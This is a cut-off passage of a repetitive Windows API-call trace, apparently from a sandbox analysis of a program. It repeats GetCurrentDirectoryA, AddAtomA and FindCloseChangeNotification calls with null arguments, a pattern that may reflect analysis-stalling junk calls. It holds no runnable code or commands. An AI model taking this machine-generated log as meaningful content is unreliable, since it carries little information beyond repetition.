GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.724] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.724] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.725] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.725] AddAtomA (lpString=0x0) returned 0x0 [0111.725] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.725] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.725] AddAtomA (lpString=0x0) returned 0x0 [0111.725] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.725] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.725] AddAtomA (lpString=0x0) returned 0x0 [0111.725] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.725] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.725] AddAtomA (lpString=0x0) returned 0x0 [0111.725] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.725] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.725] AddAtomA (lpString=0x0) returned 0x0 [0111.725] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.725] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.725] AddAtomA (lpString=0x0) returned 0x0 [0111.725] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.725] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.725] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.726] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.726] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.726] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.726] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.726] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.726] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.726] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.726] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.726] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.726] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.726] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.726] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.726] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.726] AddAtomA (lpString=0x0) returned 0x0 [0111.726] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.727] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.727] AddAtomA (lpString=0x0) returned 0x0 [0111.727] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.728] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.728] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.728] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.728] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.728] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.728] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.728] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.728] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.728] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.729] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.729] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.729] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.729] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.729] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.729] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.729] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.729] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.729] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.729] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.729] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.729] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.729] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.729] AddAtomA (lpString=0x0) returned 0x0 [0111.729] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.730] AddAtomA (lpString=0x0) returned 0x0 [0111.730] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.730] AddAtomA (lpString=0x0) returned 0x0 [0111.730] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.730] AddAtomA (lpString=0x0) returned 0x0 [0111.730] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.730] AddAtomA (lpString=0x0) returned 0x0 [0111.730] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.730] AddAtomA (lpString=0x0) returned 0x0 [0111.730] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.730] AddAtomA (lpString=0x0) returned 0x0 [0111.730] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.730] AddAtomA (lpString=0x0) returned 0x0 [0111.730] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.730] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.731] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.731] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.731] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.731] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.731] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.731] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.731] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.731] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.731] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.731] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.731] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.731] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.731] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.731] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.731] AddAtomA (lpString=0x0) returned 0x0 [0111.732] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.732] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.732] AddAtomA (lpString=0x0) returned 0x0 [0111.732] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.732] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.732] AddAtomA (lpString=0x0) returned 0x0 [0111.732] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.732] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.732] AddAtomA (lpString=0x0) returned 0x0 [0111.732] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.732] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.732] AddAtomA (lpString=0x0) returned 0x0 [0111.732] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.732] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.732] AddAtomA (lpString=0x0) returned 0x0 [0111.732] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.732] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.732] AddAtomA (lpString=0x0) returned 0x0 [0111.732] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.732] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.733] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.733] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.733] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.733] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.733] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.733] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.733] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.733] AddAtomA (lpString=0x0) returned 0x0 [0111.733] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.734] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.734] AddAtomA (lpString=0x0) returned 0x0 [0111.734] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.734] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.734] AddAtomA (lpString=0x0) returned 0x0 [0111.781] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.781] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.781] AddAtomA (lpString=0x0) returned 0x0 [0111.781] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.781] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.781] AddAtomA (lpString=0x0) returned 0x0 [0111.781] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.781] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.781] AddAtomA (lpString=0x0) returned 0x0 [0111.781] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.782] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.783] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.783] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.783] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.783] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.783] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.783] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.783] AddAtomA (lpString=0x0) returned 0x0 [0111.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.784] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.784] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.784] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.784] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.784] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.784] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.784] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.784] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.784] AddAtomA (lpString=0x0) returned 0x0 [0111.785] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.785] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.785] AddAtomA (lpString=0x0) returned 0x0 [0111.785] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.785] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.785] AddAtomA (lpString=0x0) returned 0x0 [0111.785] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.785] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.785] AddAtomA (lpString=0x0) returned 0x0 [0111.785] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.785] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.785] AddAtomA (lpString=0x0) returned 0x0 [0111.785] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.785] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.785] AddAtomA (lpString=0x0) returned 0x0 [0111.785] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.785] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.785] AddAtomA (lpString=0x0) returned 0x0 [0111.785] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.785] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.785] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.786] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.786] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.786] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.786] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.786] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.786] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.786] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.786] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.786] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.786] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.786] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.786] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.786] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.786] AddAtomA (lpString=0x0) returned 0x0 [0111.786] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.787] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.787] AddAtomA (lpString=0x0) returned 0x0 [0111.787] FindCloseChangeNotification (hChangeHandle=0x0) returned 